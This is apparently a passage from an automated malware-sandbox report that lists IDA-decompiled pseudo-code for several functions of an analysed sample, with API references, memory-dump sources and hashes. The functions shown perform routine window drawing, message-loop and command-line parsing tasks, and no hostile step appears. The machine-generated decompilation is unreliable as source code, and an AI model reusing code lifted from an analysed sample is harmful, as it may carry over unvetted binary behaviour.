						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00407258();
						E004262F8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E00426B00(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00407258();
						return _t96;
					}
					_push(_a8);
					_push(E004517A8(_t142));
					E00451E6C(_t118, _t142);
					_push(E004517A8(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00426B00(__ecx));
					_push(_v8);
					_t117 = E00451B70(_t118);
					_push(_t117);
					L0042D02C();
					return _t117;
				}
				return _t46;
			}




















      0x00451e94
      0x00451e9d
      0x00451e9f
      0x00451ea2
      0x00451ea6
      0x00451ead
      0x00451eb3
      0x00451eb7
      0x00451efd
      0x00451f01
      0x00451f0f
      0x00451f11
      0x00451f18
      0x00451f24
      0x00451f2c
      0x00451f2e
      0x00451f2e
      0x00451f41
      0x00451f55
      0x00451f5d
      0x00451f61
      0x00451f66
      0x00451f67
      0x00451f6c
      0x00451f6e
      0x00451f70
      0x00451f72
      0x00451f74
      0x00451f76
      0x00451f78
      0x00451f87
      0x00451f8b
      0x00451f93
      0x00451f94
      0x00451fb0
      0x00451fc2
      0x00451fcd
      0x00451fd9
      0x00451fe1
      0x00451fe9
      0x00451fee
      0x00451ff3
      0x00451ff5
      0x00451ffa
      0x00451ffe
      0x00452002
      0x00452007
      0x0045200b
      0x0045200b
      0x0045200c
      0x0045200d
      0x0045200e
      0x0045201b
      0x00452027
      0x0045202f
      0x00452037
      0x0045203c
      0x00452041
      0x00452043
      0x00452048
      0x0045204c
      0x00452050
      0x00452054
      0x00452055
      0x00452058
      0x00452059
      0x0045205a
      0x00000000
      0x0045205a
      0x00451ebc
      0x00451ec5
      0x00451ec8
      0x00451ed2
      0x00451ed3
      0x00451ed5
      0x00451eda
      0x00451ede
      0x00451ee6
      0x00451eea
      0x00451eed
      0x00451ef2
      0x00451ef3
      0x00000000
      0x00451ef3
      0x00452065

      APIs
      • 6F92B410.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00451EF3
      • 6F92B410.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00451F94
      • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00451FE1
      • SetBkColor.GDI32(00000000,00000000), ref: 00451FE9
      • 73BF97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 0045200E
        • Part of subcall function 00451E6C: 6F92B650.COMCTL32(00000000,?,00451ECD,00000000,?), ref: 00451E82
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B410Color$B650Text
      • String ID:
      • API String ID: 964794876-0
      • Opcode ID: fbb7dd54d91da426b147ab033b40a803ce913af3080ec3e1c1b7bd6655ad04f3
      • Instruction ID: 33e19d475e3394ec5f5de1c19d85da5c3af7b9e9a4da3a8edb18f4d6b930c696
      • Opcode Fuzzy Hash: fbb7dd54d91da426b147ab033b40a803ce913af3080ec3e1c1b7bd6655ad04f3
      • Instruction Fuzzy Hash: 3A512871740114AFCB40EF6DDD82F9E37ACAF09314F50016AF914EB296CA78EC45876A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00461028 Relevance: 12.1, APIs: 8, Instructions: 144windowCOMMON
      Download Yara Rule
      C-Code - Quality: 74%
      			E00461028(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				void* _t107;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t107 = __ecx;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x4612f0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E00443188();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x48f758; // 0x423b10
					E00406A3C(_t50, _t107,  &_v36);
					E0040CBEC(_v36, 1);
					E004043D0();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x490b7c; // 0x2481268
				E004635E0(_t56);
				_push(_t127);
				_push(0x4612d3);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x48ee28; // 0x0
				_v20 = _t60;
				_t61 =  *0x490b80; // 0x2480e74
				_t20 = _t61 + 0x78; // 0x0
				_t62 =  *0x490b80; // 0x2480e74
				_t21 = _t62 + 0x7c; // 0x24810b8
				E00419D08( *_t21,  *_t20, 0);
				_t65 =  *0x490b80; // 0x2480e74
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x490b80; // 0x2480e74
				_t24 = _t66 + 0x44; // 0x0
				_v22 =  *_t24;
				_t68 =  *0x490b80; // 0x2480e74
				E004625B4(_t68,  *_t20, 0);
				_t70 =  *0x490b80; // 0x2480e74
				_t26 = _t70 + 0x48; // 0x0
				_v28 =  *_t26;
				_v16 = E0045B38C(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4612b1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00460F78(_v8);
				_push(_t127);
				_push(0x461210);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E0044B158(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x490b7c; // 0x2481268
					E00464490(_t80, _t124, _t125);
					_t82 =  *0x490b7c; // 0x2481268
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00460ED8(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E0044B158(_v8), 0xb001, 0, 0);
				_t90 = E0044B158(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x461217);
				return E00460F70();
			}






























      0x00461028
      0x00461028
      0x00461028
      0x00461028
      0x00461029
      0x0046102b
      0x0046102e
      0x0046102f
      0x00461032
      0x00461035
      0x0046103a
      0x0046103b
      0x00461040
      0x00461043
      0x00461046
      0x00461052
      0x0046107b
      0x00461080
      0x0046108f
      0x00461094
      0x00461094
      0x004610a0
      0x004610ae
      0x004610ae
      0x004610b3
      0x004610b8
      0x004610bd
      0x004610c4
      0x004610c5
      0x004610ca
      0x004610cd
      0x004610d3
      0x004610df
      0x004610e2
      0x004610e7
      0x004610ea
      0x004610ef
      0x004610f2
      0x004610f7
      0x004610fc
      0x00461101
      0x00461109
      0x0046110c
      0x00461111
      0x00461115
      0x0046111b
      0x00461120
      0x00461125
      0x0046112a
      0x0046112d
      0x00461137
      0x0046113c
      0x0046113d
      0x00461142
      0x00461145
      0x0046114b
      0x00461152
      0x00461153
      0x00461158
      0x0046115b
      0x00461170
      0x0046117a
      0x00461180
      0x00461180
      0x00461185
      0x0046118a
      0x00461196
      0x004611b1
      0x004611b6
      0x004611b6
      0x00461198
      0x0046119b
      0x0046119b
      0x004611be
      0x004611c4
      0x004611c8
      0x004611dd
      0x004611e5
      0x004611f3
      0x004611f7
      0x004611f7
      0x004611fc
      0x004611ff
      0x00461202
      0x0046120f

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CaptureMessageSend$ActiveWindow$Release
      • String ID:
      • API String ID: 862346643-0
      • Opcode ID: e43c448457db158af6f860a78a1aec7c6a637e95adce187c29c270043eda830b
      • Instruction ID: 6fe5ce7e953383ce26337cdb57cc380d8a638604ab8120e7ef56e8edb22a3aac
      • Opcode Fuzzy Hash: e43c448457db158af6f860a78a1aec7c6a637e95adce187c29c270043eda830b
      • Instruction Fuzzy Hash: 69515D30A00244AFDB10EFAAC956B9E77F1EB49304F1484BAF400A77B1E779AD40DB49
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044916C Relevance: 12.1, APIs: 8, Instructions: 123COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0044916C(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t97;
				struct HDC__* _t98;

				_t98 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00443264(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t97 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0044B158(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0044B158(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t97 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t97 = 0x200f;
				}
				if(_t97 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t98,  &_v36, _v12, _t97);
					E00443264(_t98, _v36.top, _v36.left);
					IntersectClipRect(_t98, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00445AE8(_t82, _t98, 0x14, 0);
				_t86 = _t98;
				E00445AE8(_t82, _t98, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t98, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00419C84( *((intOrPtr*)(_t82 + 0x19c)), _t86, _v8);
						_t106 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							_t86 =  *(_t66 + 0x40);
							E0044916C(_t66,  *(_t66 + 0x40), _t98, _t106,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















      0x00449177
      0x00449179
      0x0044917b
      0x00449187
      0x00449191
      0x004491a3
      0x004491a8
      0x004491ac
      0x004491c1
      0x004491db
      0x004491e0
      0x004491e5
      0x004491e7
      0x004491ee
      0x004491ee
      0x004491c3
      0x004491c3
      0x004491ca
      0x004491ca
      0x004491f5
      0x00449207
      0x00449216
      0x00449223
      0x0044923b
      0x0044923b
      0x0044924b
      0x00449252
      0x0044925b
      0x00449260
      0x00449268
      0x004492a7
      0x004492ac
      0x004492b1
      0x004492bd
      0x0044926a
      0x0044926d
      0x00449270
      0x00000000
      0x00000000
      0x00449273
      0x00449276
      0x0044927d
      0x00449286
      0x0044928b
      0x0044928f
      0x00449295
      0x0044929a
      0x0044929a
      0x0044929f
      0x004492a2
      0x004492a2
      0x004492a2
      0x00000000
      0x0044927d

      APIs
      • SaveDC.GDI32 ref: 00449182
        • Part of subcall function 00443264: GetWindowOrgEx.GDI32(?), ref: 00443272
        • Part of subcall function 00443264: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00443288
      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004491A3
      • GetWindowLongA.USER32 ref: 004491B9
      • GetWindowLongA.USER32 ref: 004491DB
      • SetRect.USER32 ref: 00449207
      • DrawEdge.USER32(?,?,?,00000000), ref: 00449216
      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044923B
      • RestoreDC.GDI32(?,?), ref: 004492AC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
      • String ID:
      • API String ID: 2976466617-0
      • Opcode ID: 3acfa5b0b9ff9411f3361fbec3035ec8b829c0245da8772f889df54ece62c4d7
      • Instruction ID: 52e790bc8cb44e8baad99bf0852b804c86b50f0f56aaa9ca2e677c51477d291d
      • Opcode Fuzzy Hash: 3acfa5b0b9ff9411f3361fbec3035ec8b829c0245da8772f889df54ece62c4d7
      • Instruction Fuzzy Hash: 38416271B04205ABEB00EB99CC85F9F77A9AF44704F10416AFA04EB386D678ED01C7A9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00427444 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
      Download Yara Rule
      C-Code - Quality: 26%
      			E00427444(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E00402CEC(_t24, 0x40,  &_v1032);
				_push(0);
				L00407658();
				_v8 = _t25;
				_push(_t54);
				_push(0x427541);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00407348();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00407388();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00407388();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00407388();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00407388();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00407388();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x427548);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L004078C0();
				return _t29;
			}

















      0x00427445
      0x0042744e
      0x00427457
      0x0042746b
      0x00427470
      0x00427472
      0x00427477
      0x0042747c
      0x0042747d
      0x00427482
      0x00427485
      0x00427488
      0x0042748a
      0x0042748d
      0x0042748e
      0x00427493
      0x00427498
      0x004274a4
      0x004274a5
      0x004274a7
      0x004274ac
      0x004274ad
      0x004274bc
      0x00427518
      0x00427519
      0x0042751e
      0x00427522
      0x00427523
      0x004274be
      0x004274c4
      0x004274c5
      0x004274cc
      0x004274d0
      0x004274d1
      0x004274e4
      0x004274e5
      0x004274ea
      0x004274ee
      0x004274ef
      0x004274fa
      0x004274fb
      0x004274fd
      0x00427502
      0x00427503
      0x00427503
      0x004274bc
      0x0042752a
      0x0042752d
      0x00427530
      0x00427535
      0x00427538
      0x00427539
      0x0042753b
      0x00427540

      APIs
      • 73BEAC50.USER32(00000000), ref: 00427472
      • 73BEAD70.GDI32(?,00000068,00000000,00427541,?,00000000), ref: 0042748E
      • 73BEAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 004274AD
      • 73BEAEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 004274D1
      • 73BEAEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00427541), ref: 004274EF
      • 73BEAEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00427503
      • 73BEAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 00427523
      • 73BEB380.USER32(00000000,?,00427548,00427541,?,00000000), ref: 0042753B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380
      • String ID:
      • API String ID: 120756276-0
      • Opcode ID: cc7c03f1a2ab2de69333b56a7bd7be1330be001eed7115c847ec77fd40f2dcd9
      • Instruction ID: d546bd5911e6e687bcc28058ebe3c79f855e3ef3cc14b65ac5f4fc5cab1ab855
      • Opcode Fuzzy Hash: cc7c03f1a2ab2de69333b56a7bd7be1330be001eed7115c847ec77fd40f2dcd9
      • Instruction Fuzzy Hash: 392146B1A44318BBEB50DB95CD85F9E73ACEB08704F9004A6BB04F65C1D67DAE40D729
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00402D2C Relevance: 11.4, APIs: 9, Instructions: 151COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00402D2C(CHAR* __eax, CHAR* __edx) {
				char _t67;
				char _t68;
				char _t69;
				CHAR** _t74;
				CHAR** _t75;
				void* _t76;
				void* _t77;
				CHAR** _t78;

				_t78[1] = __edx;
				 *_t78 = __eax;
				_t75 = _t78;
				_t74 =  &(_t78[5]);
				while(1) {
					L2:
					_t67 =  *( *_t75);
					if(_t67 != 0 && _t67 <= 0x20) {
						 *_t75 = CharNextA( *_t75);
					}
					L2:
					_t67 =  *( *_t75);
					if(_t67 != 0 && _t67 <= 0x20) {
						 *_t75 = CharNextA( *_t75);
					}
					L4:
					if( *( *_t75) != 0x22 || ( *_t75)[1] != 0x22) {
						_t76 = 0;
						_t78[3] =  *_t75;
						while( *( *_t75) > 0x20) {
							if( *( *_t75) != 0x22) {
								 *_t74 = CharNextA( *_t75);
								_t76 = _t76 +  *_t74 -  *_t75;
								 *_t75 =  *_t74;
								continue;
							}
							 *_t75 = CharNextA( *_t75);
							while(1) {
								_t69 =  *( *_t75);
								if(_t69 == 0 || _t69 == 0x22) {
									break;
								}
								 *_t74 = CharNextA( *_t75);
								_t76 = _t76 +  *_t74 -  *_t75;
								 *_t75 =  *_t74;
							}
							if( *( *_t75) != 0) {
								 *_t75 = CharNextA( *_t75);
							}
						}
						E0040508C(_t78[1], _t76);
						 *_t75 = _t78[3];
						_t78[4] =  *(_t78[1]);
						_t77 = 0;
						while( *( *_t75) > 0x20) {
							if( *( *_t75) != 0x22) {
								 *_t74 = CharNextA( *_t75);
								if( *_t75 >=  *_t74) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									_t78[4][_t77] =  *( *_t75);
									 *_t75 =  &(( *_t75)[1]);
									_t77 = _t77 + 1;
								} while ( *_t75 <  *_t74);
								continue;
							}
							 *_t75 = CharNextA( *_t75);
							while(1) {
								_t68 =  *( *_t75);
								if(_t68 == 0 || _t68 == 0x22) {
									break;
								}
								 *_t74 = CharNextA( *_t75);
								if( *_t75 >=  *_t74) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									_t78[4][_t77] =  *( *_t75);
									 *_t75 =  &(( *_t75)[1]);
									_t77 = _t77 + 1;
								} while ( *_t75 <  *_t74);
							}
							if( *( *_t75) != 0) {
								 *_t75 = CharNextA( *_t75);
							}
						}
						_t78[2] =  *_t75;
						return _t78[2];
					} else {
						 *_t75 =  &(( *_t75)[2]);
						continue;
					}
				}
			}











      0x00402d33
      0x00402d37
      0x00402d3a
      0x00402d3c
      0x00402d4c
      0x00402d4c
      0x00402d4e
      0x00402d52
      0x00402d4a
      0x00402d4a
      0x00402d4c
      0x00402d4e
      0x00402d52
      0x00402d4a
      0x00402d4a
      0x00402d59
      0x00402d5e
      0x00402d6d
      0x00402d71
      0x00402dd2
      0x00402d7c
      0x00402dc6
      0x00402dcc
      0x00402dd0
      0x00000000
      0x00402dd0
      0x00402d86
      0x00402d9e
      0x00402da0
      0x00402da4
      0x00000000
      0x00000000
      0x00402d92
      0x00402d98
      0x00402d9c
      0x00402d9c
      0x00402db0
      0x00402dba
      0x00402dba
      0x00402db0
      0x00402ddf
      0x00402de8
      0x00402df0
      0x00402df4
      0x00402e73
      0x00402dfd
      0x00402e57
      0x00402e5d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00402e5f
      0x00402e5f
      0x00402e67
      0x00402e6a
      0x00402e6c
      0x00402e6f
      0x00000000
      0x00402e5f
      0x00402e07
      0x00402e2f
      0x00402e31
      0x00402e35
      0x00000000
      0x00000000
      0x00402e13
      0x00402e19
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00402e1b
      0x00402e1b
      0x00402e23
      0x00402e26
      0x00402e28
      0x00402e2b
      0x00402e1b
      0x00402e41
      0x00402e4b
      0x00402e4b
      0x00402e41
      0x00402e80
      0x00402e8f
      0x00402d68
      0x00402d68
      0x00000000
      0x00402d68
      0x00402d5e

      APIs
      • CharNextA.USER32(00000000), ref: 00402D81
      • CharNextA.USER32(00000000,00000000), ref: 00402D8D
      • CharNextA.USER32(00000000,00000000), ref: 00402DB5
      • CharNextA.USER32(00000000), ref: 00402DC1
      • CharNextA.USER32(?,00000000), ref: 00402E02
      • CharNextA.USER32(00000000,?,00000000), ref: 00402E0E
      • CharNextA.USER32(00000000,?,00000000), ref: 00402E46
      • CharNextA.USER32(?,00000000), ref: 00402E52
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CharNext
      • String ID:
      • API String ID: 3213498283-0
      • Opcode ID: 6252eb7603d649577013b2efeb46e2bef314ce5544348e3ca664e00b611efba3
      • Instruction ID: 7891acf85811cc4b8523932fc2b4f811fc19060ffb6a2a7212bb7b5e58fd355c
      • Opcode Fuzzy Hash: 6252eb7603d649577013b2efeb46e2bef314ce5544348e3ca664e00b611efba3
      • Instruction Fuzzy Hash: 67510D70A442829FD371DF68C588A15BBE1EF5A340B640CAEE4C5EB3D2D378AC40DB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00414E1C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 334COMMON
      Download Yara Rule
      C-Code - Quality: 69%
      			E00414E1C(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				char _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
